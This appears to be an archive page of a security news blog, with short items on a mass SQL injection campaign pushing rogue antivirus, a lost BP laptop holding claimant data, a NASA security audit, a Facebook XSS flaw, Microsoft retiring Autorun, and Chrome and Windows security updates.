The Security Pub

Random Thoughts About Security

Category Archives: Featured

SQL Injection Attack Compromises 380,000 URLs

A massive SQL injection attack campaign has been spotted by Websense researchers, and the number of unique URLs affected by it has risen from 28,000 when first detected yesterday, to 380,000 when the researchers last checked.

The injected script redirects users that have landed on various infected pages to the domain in the script, which then redirects them further to a website simulating an anti-malware check and peddling a rogue AV solution.

Both sites are currently offline, say the researchers, but the attackers have started using other domains for redirection, and will likely keep changing them up.

The researchers also noted that some iTunes URLs have been injected with the script, but that Apple has done a good job in securing the site against this kind of attacks.

“The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn’t execute on the user’s computer,” they explained.

Missing BP Laptop had Personal Data of Gulf Oil Spill Victims

 

A BP employee lost a laptop containing unencrypted personal information on approximately 13,000 people who had filed compensation claims prior to August 2010 stemming from the Gulf oil spill.

BP spokesperson, Curtis Thomas, said the oil company sent out letters notifying those affected and reported the incident to law enforcement on Monday. BP contends that none of the personal information has been misused, but nonetheless is offering to pay for any necessary credit monitoring services to the victims of the breach.

“We’re committed to the people of the Gulf Coast states affected by the Deep-water Horizon accident and spill, and we deeply regret that this occurred,” said Thomas.

The employee in question lost the laptop on March 1 during business travel, nearly a month ago, when asked why so much time elapsed before reporting the incident, Thomas claimed his company was doing “due diligence and investigating” the incident, according to AP.

The breach only affects claimants who filed claims directly to BP before the Gulf Coast Claims Facility took over the compensation operation in August of last year.

NASA systems dangerously at risk from cyberattack

An official audit of NASA’s network has concluded that the space agency faces a high risk of cyberattack.

Experts from the Office of the Inspector General (OIG) paint a grim picture of the state of the space agency’s server infrastructure, warning that vulnerabilities in its systems leave it open to defacement, denial of service or information-stealing attacks.

In particular, six unnamed IT systems were found to be at risk to attacks that might allow hackers to seize remote control of critical systems over the net – which included systems that control spacecraft – as a result of unpatched software vulnerabilities.

Read the full article – The Register

Facebook Vulnerability

There is currently an unpatched XSS vulnerability in the mobile API version of Facebook that is currently being exploited to post messages to users’ Walls, which serves as a gateway to the specially crafted website exploiting the flaw.

The flaw has been misused for a while now, but has only recently been used widely. Indonesian users are currently targeted by various groups using the vulnerability to their advantage.

It allows any website to include, for example, a maliciously prepared iframe element that contains JavaScript or use the http-equiv attribute’s “refresh” value to redirect the browser to the prepared URL containing the JavaScript,” explains Symantec. “Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall.

No user interaction is needed, so the messages are spreading through Facebook at a fast pace. Facebook’s security team has been notified about the vulnerability and is working on a fix. Hopefully it will be issued soon, since the attack seems easy to recreate.
Symantec advises users to log out of Facebook when they are not actively using it or to use script-blocking add-ons to prevent the attack.

Microsoft finally says sayonara to Autorun

After a decade of abuse, Autorun is finally being retired in older versions of Windows.

On Tuesday, Microsoft began pushing an update that changes the way Windows Server 2008 and earlier versions of the OS respond when USB thumb drives and other portable media are plugged in. Until now, those versions dutifully executed code embedded in autorun.inf files without first prompting the user. The default behavior provided a convenient way to propagate malware such as Conficker, which hijacked the feature to spread itself each time an infected drive was inserted.

Read the full article – The Register

Google Secures Chrome

And then there is version 9.0.597.84 of the Google Chrome browser available which fixes 9 security vulnerabilities. One of those is rated critical, 2 high and the last 6 get the rating ‘low’ by the Google developers. As usual, the update is installed automatically in the background. But to be sure to have the latest version already installed and active, go into the Chrome menu and check the ‘About Chrome’ entry. If the update wasn’t installed yet, it will be done by doing so.

Microsoft Patchday ahead

The Redmond company today announced that it plans to release 12 security bulletins on the upcoming Patch Tuesday. The according updates close 22 security holes within the Windows operating systems, Internet Explorer and Microsoft Office. Of those, 3 bulletins cope with critical rated vulnerabilities and the rest are rated important. Be prepared to test and roll out the updates as soon as possible! 5 of the bulletins deal with vulnerabilities which allow attackers to remotely execute code on affected computers.

According to a blog post in Microsoft’s Security Response Center, the February Patchday updates will fix the MHTML processing vulnerability as well as the thumbnail rendering security hole.